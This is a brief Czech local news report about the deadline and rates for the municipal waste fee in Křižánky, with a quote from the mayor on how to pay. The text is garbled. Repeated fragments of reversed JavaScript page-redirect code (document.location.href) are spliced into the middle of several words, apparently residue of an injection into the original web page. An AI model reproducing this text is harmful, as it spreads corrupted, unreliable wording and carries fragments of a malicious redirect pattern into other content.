Rainbow page separator

Poplatek za odpady je v Křižánkách splatný do konce dubna

Neděle, 15. února 2015

Křižánky / Do konce dubna jsou povinni obyvatelé Křižánek a vlastníci nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojících v jejich katastru uhradit místní poplatek za provoz systému shromažďování, sběru, přepravy, třídění, využívání a odstraňování komunálních odpadů. „Úhradu poplatku je možné provést v ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovosti v obecním úřadu, anebo bankovním převodem,“ sdělil starosta Křižánek Jan Sedláček.
Výše místního poplatku za komunální odpad pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok činí 350 korun za osobu s trvalým pobytem v katastru Křižánek a na 650 korun vyjde nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost v obci či v jejích místních částech, která není trvale obydlena. Známky na popelnici budou k dispozici v obecním úřadu od března.